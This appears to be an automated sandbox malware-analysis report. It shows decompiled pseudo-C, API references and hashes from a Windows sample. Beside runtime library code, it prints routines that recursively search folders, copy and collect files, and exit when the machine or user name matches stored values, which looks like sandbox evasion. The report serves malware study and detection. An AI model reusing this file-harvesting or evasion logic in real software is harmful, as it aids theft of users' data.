API ID: H_prolog3$H_prolog3_catchIncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3382576167-0
Opcode ID: b0dad1251d4abfbef442d1fe54fac49259741297cd53e4e95e14276926f6794d
Instruction ID: b9956eccad4a8ffb60c5b5b552ad0d9cf25ac6050151d6cea69e15fe821f6f04
Opcode Fuzzy Hash: b0dad1251d4abfbef442d1fe54fac49259741297cd53e4e95e14276926f6794d
Instruction Fuzzy Hash: C4217CB1900149EFCF10DFA4C8959EDBBB5BF58308F28809EE551A7342C7399A85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404AAA Relevance: 1.6, APIs: 1, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00404AAA(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* _t10;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t15;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t17 = _a4;
				_t25 = __ecx;
				if(E00404C1C(__ecx, _a4) == 0) {
					_t23 = _a8;
					_t10 = E00404BB8(_t17, __ecx, _t23, _t23, 0); // executed
					if(_t10 != 0) {
						if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
							_t12 = __ecx;
						} else {
							_t12 =  *__ecx;
						}
						E0041F8C0(_t12, _t17, _t23);
						 *((intOrPtr*)(_t25 + 0x10)) = _t23;
						if( *((intOrPtr*)(_t25 + 0x14)) < 0x10) {
							_t14 = _t25;
						} else {
							_t14 =  *_t25;
						}
						 *((char*)(_t14 + _t23)) = 0;
					}
					return _t25;
				}
				if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
					_t15 = __ecx;
				} else {
					_t15 =  *__ecx;
				}
				return E00404B1F(_t25, _t25, _t17 - _t15, _a8);
			}

0x00404aae
0x00404ab3
0x00404abc
0x00404adb
0x00404ae3
0x00404aea
0x00404af0
0x00404af6
0x00404af2
0x00404af2
0x00404af2
0x00404afb
0x00404b07
0x00404b0a
0x00404b10
0x00404b0c
0x00404b0c
0x00404b0c
0x00404b12
0x00404b12
0x00000000
0x00404b18
0x00404ac2
0x00404ac8
0x00404ac4
0x00404ac4
0x00404ac4
0x00000000

APIs

_memmove.LIBCMT ref: 00404AFB

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: fc8054f27e3693ad9eda1e442a26a3435237487e0a197911f1c23e409f2ab8dd
Instruction ID: 498593a08cdc54ccc6680d0007740263a0c5562b1bd4d7a59da0897b63a86266
Opcode Fuzzy Hash: fc8054f27e3693ad9eda1e442a26a3435237487e0a197911f1c23e409f2ab8dd
Instruction Fuzzy Hash: E401B5B13002109BDB30AE5D9840A67B7BCEBC2754B50083FF645A7292C7B9ED4587ED

Uniqueness

Uniqueness Score: -1.00%

Function 00428564 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00428564(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x445fe4, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x44664c;
					if( *0x44664c == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00426598(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00424F30(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x00428569
0x0042856e
0x0042858b
0x00428590
0x00428592
0x00428594
0x00428596
0x00428596
0x00428596
0x00000000
0x0042859e
0x004285a7
0x004285ad
0x004285af
0x00000000
0x00000000
0x004285e3
0x004285e5
0x00000000
0x004285b1
0x004285b1
0x004285b8
0x004285d6
0x004285d9
0x004285db
0x004285dd
0x004285dd
0x004285ba
0x004285bb
0x004285c1
0x004285c3
0x00428597
0x00428597
0x00428599
0x0042859c
0x00000000
0x00000000
0x00000000
0x00000000
0x004285c5
0x004285c5
0x004285c8
0x004285ca
0x004285cc
0x004285cc
0x004285d2
0x004285d2
0x004285c3
0x00000000
0x00428570
0x00428574
0x00428577
0x0042857a
0x00000000
0x0042857c
0x00428581
0x0042858a
0x0042858a
0x0042857a
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00424E6A,00420486,?,00000000,00000000,00000000,?,00428124,00000001,00000214,?,00420486), ref: 004285A7

Part of subcall function 00424F30: __getptd_noexit.LIBCMT ref: 00424F30

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 117429a6cc8d31b3e05465d29a8cf660a72348dd4164ddf5c7ca0e5ab1d6efd9
Instruction ID: 9e6f21ff09ad8b4cf45ba2ef56c18f19f37a71af466109d0723caf5588eabfe2
Opcode Fuzzy Hash: 117429a6cc8d31b3e05465d29a8cf660a72348dd4164ddf5c7ca0e5ab1d6efd9
Instruction Fuzzy Hash: D1017531306635ABEF249F25FC14B6F3794AB81764F854A2FA815CA290DF78D880C699

Uniqueness

Uniqueness Score: -1.00%

Function 00420335 Relevance: 1.5, APIs: 1, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00420335(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _t10;
				signed int _t16;

				_t20 = _a12;
				if(_a12 != 0) {
					_t16 = _a4;
					__eflags = _t16;
					if(__eflags == 0) {
						L4:
						 *((intOrPtr*)(E00424F30(__eflags))) = 0x16;
						goto L9;
					} else {
						__eflags = _a8;
						if(__eflags > 0) {
							_t10 = E0042026B(E00426965, _t16, _a8, _a12, _a16, _a20); // executed
							__eflags = _t10;
							if(_t10 < 0) {
								 *_t16 = 0;
							}
							__eflags = _t10 - 0xfffffffe;
							if(__eflags == 0) {
								 *((intOrPtr*)(E00424F30(__eflags))) = 0x22;
								L9:
								_t10 = E004268AE() | 0xffffffff;
								__eflags = _t10;
							}
						} else {
							goto L4;
						}
					}
					return _t10;
				} else {
					 *((intOrPtr*)(E00424F30(_t20))) = 0x16;
					return E004268AE() | 0xffffffff;
				}
			}

0x0042033a
0x0042033e
0x00420356
0x00420359
0x0042035b
0x00420363
0x00420368
0x00000000
0x0042035d
0x0042035d
0x00420361
0x00420382
0x0042038a
0x0042038c
0x0042038e
0x0042038e
0x00420391
0x00420394
0x0042039b
0x004203a1
0x004203a6
0x004203a6
0x004203a6
0x00000000
0x00000000
0x00000000
0x00420361
0x004203ab
0x00420340
0x00420345
0x00420354
0x00420354

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: cb10895f1aebc1fb92c71030d88ba2dc5a024cbfc40f40842cfadeed62d0b35c
Instruction ID: c3db1c4671093659b57155da951770f1eae77f53cd2e0e3bb25eff738f2edcdf
Opcode Fuzzy Hash: cb10895f1aebc1fb92c71030d88ba2dc5a024cbfc40f40842cfadeed62d0b35c
Instruction Fuzzy Hash: 7EF08631611278DFCF116EA5BC0179B3A949F41338F95064BFD64452D2C77988609BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004049CF Relevance: 1.5, APIs: 1, Instructions: 18
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004049CF(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t12;

				_t12 = __ecx;
				_t2 = __ecx + 0x10;
				 *(__ecx + 0x10) =  *(__ecx + 0x10) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				E00404AAA(_t12,  *_t2, _a4, E004201E0(_a4)); // executed
				return _t12;
			}

0x004049d6
0x004049d8
0x004049d8
0x004049dc
0x004049e3
0x004049f2
0x004049fb

APIs

_strlen.LIBCMT ref: 004049E6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: eccc55699554419e5667798dca6aac2b354cae37fbb51bae0c8547f70b960fc1
Instruction ID: f72cdb60321e1854c1e3edf862f5aad1bbcf096de63fb8b252155012377e52fb
Opcode Fuzzy Hash: eccc55699554419e5667798dca6aac2b354cae37fbb51bae0c8547f70b960fc1
Instruction Fuzzy Hash: D9D02B312003146BD7212E41D40676ABFD8DB003B5F00002EF98446281CBBE5950C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCC7 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CCC7(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t1;
				int _t2;
				void* _t3;
				intOrPtr _t5;
				intOrPtr _t6;

				_t1 = E0041704D(__ebx, __edx, __edi, __esi);
				_t5 =  *0x4470f8; // 0x6e2ec8
				_t2 = E00417B62(_t5, _t1);
				if(_t2 == 0) {
					_t3 = E0041717C();
					_t6 =  *0x447260; // 0x6e2ed8
					_t2 = E00417B62(_t6, _t3);
					if(_t2 == 0) {
						ExitProcess(_t2);
					}
				}
				return _t2;
			}

0x0040ccc7
0x0040cccc
0x0040ccd4
0x0040ccdb
0x0040ccdd
0x0040cce2
0x0040ccea
0x0040ccf1
0x0040ccf4
0x0040ccf4
0x0040ccf1
0x0040ccfa

APIs

Part of subcall function 0041704D: GetComputerNameA.KERNEL32 ref: 0041707C

Part of subcall function 0041717C: GetUserNameA.ADVAPI32(?,?), ref: 004171A7

ExitProcess.KERNEL32 ref: 0040CCF4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Name$ComputerExitProcessUser
String ID:
API String ID: 162832415-0
Opcode ID: c907233fde9c2e378fb14e6030021133c2808c8a3acd8df7e6955ef525ddbf07
Instruction ID: 802423e30cc614f56ba9471296b7592c1822200fdfea4710fcaaa8244cc532d4
Opcode Fuzzy Hash: c907233fde9c2e378fb14e6030021133c2808c8a3acd8df7e6955ef525ddbf07
Instruction Fuzzy Hash: E5D09E34B0C30186EE10AB72D99949625696A9634C700447AB90B93352EF3CDC82A50C

Uniqueness

Uniqueness Score: -1.00%

Function 00406C20 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406C20(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
				void* _t3;

				_t3 = E0042065B(__ecx, _a8, _a12); // executed
				return _t3;
			}

0x00406c29
0x00406c31

APIs

_calloc.LIBCMT ref: 00406C29

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 2c7ec3b2e807d8b7c0ad2e02943526bb363768a160ad05b6fb7b5f757cebcceb
Instruction ID: 28c3ffb2a135d4528a07d51f1fc697da7971a22a2a49ceb039be09d28f251a7b
Opcode Fuzzy Hash: 2c7ec3b2e807d8b7c0ad2e02943526bb363768a160ad05b6fb7b5f757cebcceb
Instruction Fuzzy Hash: 98B0923200C30DAB9F052E82BC028593BA9EA40674B60401BF91C040626A33A430564C

Uniqueness

Uniqueness Score: -1.00%

Function 00427FC2 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,0042D752,00446020,00000314,00000000,?,?,?,?,?,004264DE,00446020,Microsoft Visual C++ Runtime Library,00012010), ref: 00427FC4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 50277f79b4feed082f669946eee4f1747cfefd908ec48ccff76891eb66a502d1
Instruction ID: 46a57615bc314b38db9fb857a3a01dca1989ca31df3803e2f0ba9fd2e0215199
Opcode Fuzzy Hash: 50277f79b4feed082f669946eee4f1747cfefd908ec48ccff76891eb66a502d1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004132B0 Relevance: 63.2, APIs: 33, Strings: 3, Instructions: 218stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004132FD
FindFirstFileA.KERNEL32(?,?), ref: 00413314
StrCmpCA.SHLWAPI(?,0043F354), ref: 0041334A
StrCmpCA.SHLWAPI(?,0043F358), ref: 00413364
_memset.LIBCMT ref: 0041337B
_memset.LIBCMT ref: 0041338C
lstrcat.KERNEL32(?,?), ref: 004133A1
lstrcat.KERNEL32(?,0043D134), ref: 004133AF
lstrcat.KERNEL32(?,?), ref: 004133C3
lstrcat.KERNEL32(?,0043D134), ref: 004133D1
lstrcat.KERNEL32(?), ref: 004133F1
lstrcat.KERNEL32(?,0043D134), ref: 004133FF
lstrcat.KERNEL32(?,?), ref: 00413412
lstrcat.KERNEL32(?,0043D134), ref: 00413420
lstrcat.KERNEL32(?,?), ref: 00413433
lstrcat.KERNEL32(?,0043D134), ref: 00413441
lstrcat.KERNEL32(?,?), ref: 00413454
lstrcat.KERNEL32(?,0043D134), ref: 0041346E
lstrcat.KERNEL32(?,0043D134), ref: 00413484
lstrcat.KERNEL32(?), ref: 004134AD
lstrcat.KERNEL32(?,0043D134), ref: 004134BB
lstrcat.KERNEL32(?,?), ref: 004134CF
_memset.LIBCMT ref: 004134DE
lstrcat.KERNEL32(?), ref: 004134F3
lstrcat.KERNEL32(?,00000000), ref: 00413509
CopyFileA.KERNEL32(?,?,00000001), ref: 0041351F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413539
StrCmpCA.SHLWAPI(?,00000000,?,000003E8,00000000,?), ref: 00413550
StrCmpCA.SHLWAPI(?,?,000003E8,00000000,?), ref: 0041356C
DeleteFileA.KERNEL32(?,000003E8,00000000,?), ref: 004135A4
FindNextFileA.KERNEL32(?,?), ref: 004135B7
FindClose.KERNEL32(?), ref: 004135CB

Strings

%s\%s\%s\%s, xrefs: 004132D1
%s\*, xrefs: 004132F1
%s\%s, xrefs: 004132C7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find_memset$CloseCopyDeleteFirstNextUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %s\%s$%s\%s\%s\%s$%s\*
API String ID: 676975003-3933763253
Opcode ID: 79c2225db4c4569396a3d0dbb2e59ebeef35f915c558f564b7ae8b4f89a7cf3f
Instruction ID: c6db0fce9809dbbab3169d51bc01e7e79c64f6baabf5e2679e8603cfe4d36ec4
Opcode Fuzzy Hash: 79c2225db4c4569396a3d0dbb2e59ebeef35f915c558f564b7ae8b4f89a7cf3f
Instruction Fuzzy Hash: 8591FC76D0411DABDB21DFA0EC49EEA7B7DFB09346F0408A6B619D2120D7349B86CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00409284 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 117
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00409284(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				int _t49;
				intOrPtr _t51;
				void* _t56;
				void* _t64;
				void* _t75;
				void* _t84;
				void* _t85;
				void* _t86;

				_t83 = __esi;
				_t75 = __ebx;
				_push(0x570);
				E00423679(E00434214, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t84 - 4)) = 0;
				 *(_t84 - 0x578) = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
				wsprintfA(_t84 - 0x32c, "%s\\*", __ebx);
				_t86 = _t85 + 0xc;
				_t37 = FindFirstFileA(_t84 - 0x32c, _t84 - 0x574);
				 *(_t84 - 0x57c) = _t37;
				if(_t37 == 0xffffffff) {
					L7:
					E00404A66(_t84 + 8, 1, 0);
					return E004236C3(_t75, 0, _t83);
				}
				_t83 = 0x104;
				do {
					_push(".");
					_push(_t84 - 0x548);
					if( *0x447510() != 0) {
						_t56 =  *0x447510(_t84 - 0x548, "..");
						_t93 = _t56;
						if(_t56 != 0) {
							wsprintfA(_t84 - 0x434, "%s\\%s", _t75, _t84 - 0x548);
							E0041F6B0(_t84 - 0x11c, 0, _t83);
							_t86 = _t86 + 0x1c;
							 *0x4474e0(_t84 - 0x11c,  *0x447058);
							_t64 = 0x1a;
							 *0x4474e0(_t84 - 0x11c, E00417BB8(_t64, _t93));
							CopyFileA(_t84 - 0x434, _t84 - 0x11c, 1);
							_push( *(_t84 - 0x578));
							_push(_t84 - 0x11c);
							E00408F1F(_t75, 0, _t83, _t93);
							DeleteFileA(_t84 - 0x11c);
						}
					}
				} while (FindNextFileA( *(_t84 - 0x57c), _t84 - 0x574) != 0);
				FindClose( *(_t84 - 0x57c));
				E0041F6B0(_t84 - 0x224, 0, _t83);
				 *0x4474e0(_t84 - 0x224,  *0x44724c);
				_t49 = lstrlenA( *(_t84 - 0x578));
				_t51 =  *0x4472ac; // 0x0
				E0041EAE0(_t51, _t84 - 0x224, _t49, 3);
				E0041F6B0(_t84 - 0x578, 0, 4);
				goto L7;
			}

0x00409284
0x00409284
0x00409284
0x0040928e
0x0040929b
0x004092ac
0x004092be
0x004092c4
0x004092d5
0x004092db
0x004092e4
0x00409434
0x0040943a
0x00409444
0x00409444
0x004092ea
0x004092ef
0x004092ef
0x004092fa
0x00409303
0x00409315
0x0040931b
0x0040931d
0x00409337
0x00409346
0x0040934b
0x0040935b
0x00409363
0x00409371
0x00409387
0x0040938d
0x00409399
0x0040939a
0x004093a8
0x004093a8
0x0040931d
0x004093c1
0x004093cf
0x004093de
0x004093f3
0x004093ff
0x00409415
0x0040941a
0x0040942c
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 0040928E
GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00409735,?), ref: 0040929E
HeapAlloc.KERNEL32(00000000), ref: 004092A5
wsprintfA.USER32 ref: 004092BE
FindFirstFileA.KERNEL32(?,?), ref: 004092D5
StrCmpCA.SHLWAPI(?,0043F354), ref: 004092FB
StrCmpCA.SHLWAPI(?,0043F358), ref: 00409315
wsprintfA.USER32 ref: 00409337
_memset.LIBCMT ref: 00409346
lstrcat.KERNEL32(?), ref: 0040935B

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00409371
CopyFileA.KERNEL32(?,?,00000001), ref: 00409387

Part of subcall function 00408F1F: __EH_prolog3_GS.LIBCMT ref: 00408F29
Part of subcall function 00408F1F: _memset.LIBCMT ref: 00408F50
Part of subcall function 00408F1F: _memset.LIBCMT ref: 00408F61
Part of subcall function 00408F1F: lstrcat.KERNEL32(?,00000000), ref: 00408F85
Part of subcall function 00408F1F: lstrcat.KERNEL32(?), ref: 00408F98
Part of subcall function 00408F1F: lstrcat.KERNEL32(?,?), ref: 00408FAC
Part of subcall function 00408F1F: lstrcat.KERNEL32(?,0043D134), ref: 00408FBE
Part of subcall function 00408F1F: lstrcat.KERNEL32(?), ref: 00408FD1
Part of subcall function 00408F1F: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0040939F,?,?), ref: 00409007

DeleteFileA.KERNEL32(?), ref: 004093A8
FindNextFileA.KERNEL32(?,?), ref: 004093BB
FindClose.KERNEL32(?), ref: 004093CF
_memset.LIBCMT ref: 004093DE
lstrcat.KERNEL32(?), ref: 004093F3
lstrlenA.KERNEL32(?), ref: 004093FF
_memset.LIBCMT ref: 0040942C

Strings

%s\*, xrefs: 004092B8
%s\%s, xrefs: 00409331

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memset$Findwsprintf$H_prolog3_Heap$AllocAttributesCloseCopyCountDeleteFirstNextProcessTick_malloc_randlstrlen
String ID: %s\%s$%s\*
API String ID: 2841334194-2848263008
Opcode ID: 680c6fa79212f74019a14a14bb5c8910d8952784039a719b8831f83751bf2c26
Instruction ID: d6d3fa6d113f1535b33b62eeb47e26ea6e895b3e638d04bcf6b52d60dc3a7ae5
Opcode Fuzzy Hash: 680c6fa79212f74019a14a14bb5c8910d8952784039a719b8831f83751bf2c26
Instruction Fuzzy Hash: F1413376D44118ABCB20AFB0EC49EDB7B7CAB49745F0004F6B609E2061EB349B85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004118D3 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 137
fileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004118D3(intOrPtr __ecx, void* __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				char _v280;
				char _v544;
				struct _WIN32_FIND_DATAA _v864;
				intOrPtr _v868;
				CHAR* _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				void* _v884;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t48;
				int _t53;
				void* _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t92 = __edx;
				_t45 =  *0x444664; // 0xfa3a0753
				_v12 = _t45 ^ _t95;
				_t81 = _a20;
				_t94 = _a12;
				_t93 = _a16;
				_v872 = _a4;
				_t48 = _a8;
				_v876 = _t48;
				_v868 = __ecx;
				_v880 = _a20;
				wsprintfA( &_v544, "%s\\*", _t48);
				_t97 = _t96 + 0xc;
				_t53 = FindFirstFileA( &_v544,  &_v864);
				_v884 = _t53;
				if(_t53 == 0xffffffff) {
					L19:
					return E0041F69E(_t53, _t81, _v12 ^ _t95, _t92, _t93, _t94);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(".");
					_push( &(_v864.cFileName));
					if( *0x447510() == 0) {
						goto L17;
					}
					_push("..");
					_push( &(_v864.cFileName));
					if( *0x447510() == 0) {
						goto L17;
					}
					wsprintfA( &_v280, "%s\\%s", _v876,  &(_v864.cFileName));
					_t97 = _t97 + 0x10;
					_push( *0x446f1c);
					_push( &(_v864.cFileName));
					if( *0x447510() != 0) {
						_push( *0x446a2c);
						_push( &(_v864.cFileName));
						if( *0x447510() != 0) {
							_push( *0x447290);
							_push( &(_v864.cFileName));
							if( *0x447510() != 0) {
								_push( *0x446ab0);
								_push( &(_v864.cFileName));
								if( *0x447510() != 0) {
									if((_v864.dwFileAttributes & 0x00000010) == 0) {
										goto L17;
									}
									goto L16;
								}
								if( *((char*)(_v868 + 2)) != 0) {
									E0041124A( &_v280, _v872, _t94, _t93);
									_t97 = _t97 + 0xc;
								}
								L11:
								_t81 = _v880;
								goto L16;
							}
							_push(_v876);
							if( *0x4472f0() == 0) {
								E00410BC5(_t81, _v876, _t92, _t94);
							}
							goto L11;
						}
						E0041140C( &_v280, _v872, _t94, _t93);
						goto L5;
					} else {
						E00410E56( &_v280, _v872, _t94, _t93);
						L5:
						_t97 = _t97 + 0xc;
						L16:
						E004118D3(_v868, _t92,  &(_v864.cFileName),  &_v280, _t94, _t93, _t81);
					}
					L17:
				} while (FindNextFileA(_v884,  &_v864) != 0);
				_t53 = FindClose(_v884);
				goto L19;
			}

0x004118d3
0x004118dc
0x004118e3
0x004118ea
0x004118ee
0x004118f2
0x004118f5
0x004118fb
0x004118ff
0x00411911
0x00411917
0x0041191d
0x00411923
0x00411934
0x0041193a
0x00411943
0x00411ac1
0x00411acf
0x00000000
0x00000000
0x00000000
0x00411949
0x00411949
0x00411949
0x00411954
0x0041195d
0x00000000
0x00000000
0x00411963
0x0041196e
0x00411977
0x00000000
0x00000000
0x00411996
0x0041199c
0x0041199f
0x004119ab
0x004119b4
0x004119d1
0x004119dd
0x004119e6
0x004119fd
0x00411a09
0x00411a12
0x00411a3a
0x00411a46
0x00411a4f
0x00411a7c
0x00000000
0x00000000
0x00000000
0x00411a7c
0x00411a5b
0x00411a6b
0x00411a70
0x00411a70
0x00411a32
0x00411a32
0x00000000
0x00411a32
0x00411a14
0x00411a23
0x00411a2c
0x00411a31
0x00000000
0x00411a23
0x004119f6
0x00000000
0x004119b6
0x004119c4
0x004119c9
0x004119c9
0x00411a7e
0x00411a95
0x00411a95
0x00411a9a
0x00411aad
0x00411abb
0x00000000

APIs

wsprintfA.USER32 ref: 0041191D
FindFirstFileA.KERNEL32(?,?), ref: 00411934
StrCmpCA.SHLWAPI(?,0043F354), ref: 00411955
StrCmpCA.SHLWAPI(?,0043F358), ref: 0041196F
wsprintfA.USER32 ref: 00411996
StrCmpCA.SHLWAPI(?), ref: 004119AC
StrCmpCA.SHLWAPI(?), ref: 004119DE

Part of subcall function 00410E56: _memset.LIBCMT ref: 00410E99
Part of subcall function 00410E56: lstrcat.KERNEL32(?,0043D12C), ref: 00410EAE
Part of subcall function 00410E56: lstrcat.KERNEL32(?,00000000), ref: 00410EC4
Part of subcall function 00410E56: CopyFileA.KERNEL32(?,?,00000001), ref: 00410ED4
Part of subcall function 00410E56: _memset.LIBCMT ref: 00410EE3
Part of subcall function 00410E56: lstrcat.KERNEL32(?,0043D134), ref: 00410EF8
Part of subcall function 00410E56: lstrcat.KERNEL32(?), ref: 00410F0B
Part of subcall function 00410E56: lstrcat.KERNEL32(?,0043D134), ref: 00410F19
Part of subcall function 00410E56: lstrcat.KERNEL32(?,?), ref: 00410F2C
Part of subcall function 00410E56: lstrcat.KERNEL32(?,0043F72C), ref: 00410F3E
Part of subcall function 00410E56: lstrcat.KERNEL32(?,?), ref: 00410F51
Part of subcall function 00410E56: lstrcat.KERNEL32(?,.txt), ref: 00410F63
Part of subcall function 00410E56: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00410FB5
Part of subcall function 00410E56: HeapAlloc.KERNEL32(00000000), ref: 00410FBC

StrCmpCA.SHLWAPI(?), ref: 00411A0A
StrCmpCA.SHLWAPI(?), ref: 00411A47

Part of subcall function 00410BC5: _memset.LIBCMT ref: 00410C08
Part of subcall function 00410BC5: lstrcat.KERNEL32(?,?), ref: 00410C18
Part of subcall function 00410BC5: lstrcat.KERNEL32(?,0043D134), ref: 00410C2A
Part of subcall function 00410BC5: lstrcat.KERNEL32(?), ref: 00410C3D
